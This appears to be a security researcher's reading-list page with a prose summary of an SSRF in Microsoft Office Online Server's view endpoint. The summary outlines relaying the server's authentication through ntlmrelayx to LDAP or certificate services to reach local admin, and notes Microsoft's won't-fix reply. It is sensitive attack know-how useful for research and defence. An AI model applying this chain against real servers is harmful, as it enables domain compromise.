Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
- The online version of Microsoft Office is used to view various Microsoft type documents.
- The
GETrequest to/op/view.aspxhad a Server-Side Request Forgery (SSRF) vulnerability. They learned this from using Burp Collaborator. - While doing this, they noticed that the Office Online server was using its own authentication in order to access things. As a result, it could be coerced into arbitrary authenticated requests.
- Some thoughts on exploitation includes relaying this through LDAP to create shadow credentials or recover the client certificate for PKINT authentication. Using the tool ntlmrelayx tool and relaying this to Active Directory Certificate Services (ADCS), we can generate a certificate. Additionally, using this certificate allows for a TGT to be gained to become a local admin on the online server host.
- Microsoft closed this as a won't fix because the SSRF with auth is intended. There advice was to "lock down ports and any accounts on that farm to have least privilege" which is really disappointing. Overall, good find!
